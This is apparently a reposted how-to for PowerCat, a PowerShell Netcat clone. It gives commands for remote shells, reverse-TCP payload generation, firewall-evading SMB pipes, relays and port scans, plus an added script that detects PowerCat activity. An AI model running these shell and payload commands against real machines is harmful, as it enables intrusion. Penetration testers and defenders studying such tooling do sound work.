POWERCAT – A PowerShell Version of Netcat

  • November 15th, 2015
  • admin

Powercat provides the full functionality of the venerable Linux tool Netcat on Windows systems. This is achieved through native integration of PowerShell 2 components.

Below you will find a HowTo.

Source: http://www.hackinsight.org/news,497.html

Installation

PowerCat is packaged as a PowerShell module. You must import the module to use its functions.

    # Import the functions via the psd1 file:
    Import-Module PowerCat.psd1

Functions & Parameters:

    Start-PowerCat # Starts a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb.
    -Port           # The port to listen on.
    -PipeName       # Name of pipe to listen on.

    -Relay          # Format: ":" (see the Relays section below for examples)
    -Execute        # Execute a console process or powershell.
    -SendFile       # Filepath of file to send.
    -ReceiveFile    # Filepath of file to be written.
    -Disconnect     # Disconnect after connecting.
    -KeepAlive      # Restart after disconnecting.
    -Timeout        # Timeout option. Default: 60 seconds

    Connect-PowerCat # Connects a client to a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb
    -RemoteIp       # IPv4 address of host to connect to.
    -Port           # The port to connect to.
    -PipeName       # Name of pipe to connect to.

    -Relay          # Format: "::" (see the Relays section below for examples)
    -Execute        # Execute a console process or powershell.
    -SendFile       # Filepath of file to send.
    -ReceiveFile    # Filepath of file to be written.
    -Disconnect     # Disconnect after connecting.
    -Timeout        # Timeout option. Default: 60 seconds

Basic Connections

By default, PowerCat uses TCP and reads from / writes to the console.

    # Basic Listener:
    Start-PowerCat -Port 443

    # Basic Client:
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

File Transfer

PowerCat can be used to transfer files using the -SendFile and -ReceiveFile parameters.

    # Send File:
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\path\to\inputfile

    # Receive File:
    Start-PowerCat -Port 443 -ReceiveFile C:\path\to\outputfile

Shells

PowerCat can be used to send and serve (Power)shells using the -Execute parameter.

    # Serve a shell:
    Start-PowerCat -Port 443 -Execute

    # Send a cmd Shell:
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -Execute

UDP and SMB

PowerCat supports more than sending data over TCP.

    # Send Data Over UDP:
    Start-PowerCat -Mode Udp -Port 8000

    # Send Data Over SMB (easily sneak past firewalls):
    Start-PowerCat -Mode Smb -PipeName PowerCat

Relays

Relays in PowerCat are similar to netcat relays, but you don’t have to create a file or start a second process. You can also relay data between connections of different protocols.

    # UDP Listener to TCP Client Relay:
    Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443

    # TCP Listener to UDP Client Relay:
    Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53

    # TCP Client to Client Relay
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443

    # TCP Listener to SMB Listener Relay (Start-PowerCat is the listener function documented above):
    Start-PowerCat -Port 8000 -Relay smb:PowerCat

Generate Payloads

Payloads can be generated using the New-PowerCatPayload function.

    # Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
    New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute

    # Generate a tcp payload that listens on port 8000:
    New-PowerCatPayload -Listener -Port 8000 -Execute

Misc Usage

PowerCat can also perform port-scans, start persistent listeners, or act as a simple web server.

    # Basic TCP port scan:
    1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

    # Basic UDP port scan:
    1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

    # Persistent listener:
    Start-PowerCat -Port 443 -Execute -KeepAlive

    # Simple Web Server:
    Start-PowerCat -Port 80 -SendFile index.html
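As an added example (not code from PowerCat or the original post), here is a defender-side check for the commands shown in this HowTo and for the named pipe used in the UDP and SMB section; it assumes PowerShell Script Block Logging is enabled (event 4104 in Microsoft-Windows-PowerShell/Operational) and that Smb mode listens on \\.\pipe\<PipeName>, and all function and parameter names are my own.

```powershell
# Added example, not part of PowerCat or the original post: a defender-side hunt for the
# commands shown in this HowTo. Assumes PowerShell Script Block Logging is enabled
# (event 4104 in Microsoft-Windows-PowerShell/Operational); function and parameter
# names below are my own.
function Find-PowerCatActivity {
    [CmdletBinding()]
    param(
        [int]$Hours = 24,
        # Cmdlet names documented above; Import-Module catches the psd1 load.
        [string[]]$Indicators = @('Start-PowerCat', 'Connect-PowerCat',
                                  'New-PowerCatPayload', 'Import-Module PowerCat'),
        # Pipe name used in the SMB example above (assumed to appear as \\.\pipe\<PipeName>).
        [string]$PipeName = 'PowerCat'
    )
    $hits = @()

    # 1. Script block log: every logged block is checked for the PowerCat cmdlet names.
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    foreach ($evt in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $text = [string]$evt.Properties[2].Value   # property 2 of event 4104 is ScriptBlockText
        $ind = $Indicators | Where-Object { $text -like "*$_*" } | Select-Object -First 1
        if ($ind) {
            $hits += [pscustomobject]@{
                Source    = 'ScriptBlockLog'
                Time      = $evt.TimeCreated
                Indicator = $ind
                Detail    = ($text -split "`n")[0].Trim()   # first line of the logged block
            }
        }
    }

    # 2. Named pipes: a live Smb-mode listener is expected to show up as \\.\pipe\<PipeName>.
    foreach ($p in [System.IO.Directory]::GetFiles('\\.\pipe\')) {
        if ($p -like "*\pipe\$PipeName") {
            $hits += [pscustomobject]@{
                Source = 'NamedPipe'; Time = Get-Date; Indicator = 'PipeName'; Detail = $p
            }
        }
    }
    return $hits
}

Find-PowerCatActivity -Hours 48 | Format-Table -AutoSize
```

Run it from an elevated PowerShell session, since reading the operational log and enumerating pipes may otherwise return nothing.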

Exiting

In most cases, the ESC key can be used to gracefully exit PowerCat.

You may watch the full presentation prepared by Mike Douglas at DerbyCon 4 covering PowerCat usage:
